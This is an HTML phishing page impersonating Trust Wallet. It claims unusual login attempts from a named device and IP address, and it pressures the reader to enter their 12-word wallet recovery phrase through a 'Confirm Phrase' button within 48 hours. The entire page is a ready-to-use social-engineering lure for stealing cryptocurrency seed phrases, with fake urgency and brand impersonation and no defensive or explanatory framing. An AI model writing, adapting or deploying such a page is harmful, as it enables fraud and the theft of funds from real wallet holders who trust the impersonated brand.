<!DOCTYPE html>
<html>
<head>
  <meta charset='utf-8'>
  <meta http-equiv='X-UA-Compatible' content='IE=edge'>
  <title>Trust Wallet</title>
  <meta name='viewport' content='width=device-width, initial-scale=1'>

  <style>
    body {
      background-color: #ffffff;
      margin: 0;
      padding: 0;
    }

    #main {
      border: 3px solid rgb(80, 165, 80);
      background-color: black;
      border-radius: 10px;
      margin: 20px auto;
      width: 80%; /* Adjusted width for responsiveness */
      max-width: 600px; /* Added max-width for responsiveness */
      padding: 20px;
    }

    .pic {
      display: block;
      margin: 0 auto;
      margin-top: -25px;
      max-width: 100%; /* Ensures image doesn't overflow container */
      height: auto;
    }

    .text {
      color: #ffffff;
      padding: 8px;
      font-family: sans-serif;
      font-size: 16px;
      line-height: 23px;
      text-align: center;
      margin-top: 20px;
      line-height: 25px;
      display: inline;
    }

    .bot {
      width: 100%;
      max-width: 155px; /* Adjusted max-width for responsiveness */
      height: 30px;
      background-color: rgb(80, 165, 80);
      border: 2px solid rgb(80, 165, 80);
      border-radius: 10px;
      color: #ffffff;
      font-family: Georgia, 'Times New Roman', Times, serif;
      font-size: 12px;
      display: block;
      margin: 10px auto;
      text-align: center;
      text-decoration: none; /* Removed underline from button */
    }

    .nav {
      text-align: center;
      font-family: Georgia, 'Times New Roman', Times, serif;
      font-size: 16px;
      color: #ffffff;
    }

    .nav a {
      text-decoration: none; /* Removed underlines from links */
      color: #ffffff;
      margin: 0 10px; /* Adjusted margin for better spacing */
    }
    .text1 {
      margin-left: -10px;
    }
    .text3 {
      margin-left: 0px;
      color: rgb(235, 230, 230);
      font-family: sans-serif;
      font-size: 14px;
      line-height: 15px;
      background-color: rgb(37, 33, 33);
      height: 80px;
      border-radius: 10px;
      padding: 13px;
      
    }

  </style>
</head>
<body> 

  <table id="main">
    <tr>
      <td>
        <table class="top">
          <tr>
            <td></td>
          </tr>
        </table>
        <img class="pic" src="https://res.cloudinary.com/dg4m13dox/image/upload/v1735084419/wall_piwvpw.jpg" alt="Logo" width="220">
        <p class="text"><span class="text1">Dear valued Customer,</span> <br> We noticed several unusual login attempt into your account<br> From the following device: <br><br>Server: Trust_wallet/7.66.9/ios  <br> IP address:172.241.169.241 <br>Country/District: Texas <br><br> If this wasn't you trying to access your account <br>kindly confirm your 12 digits login phrase <br> into the link below within 48 hours to ensure this is your account. <p class="text3"> NOTE: After saving your 12 digits login phrase in the sheets,<br> Make sure to save it for security reasons and future use. <br>
         <a href="/form"><button class="bot">Confirm Phrase</button></a> </p>  </p>
        
      </td>
    </tr>
  </table>
  
</body>
</html>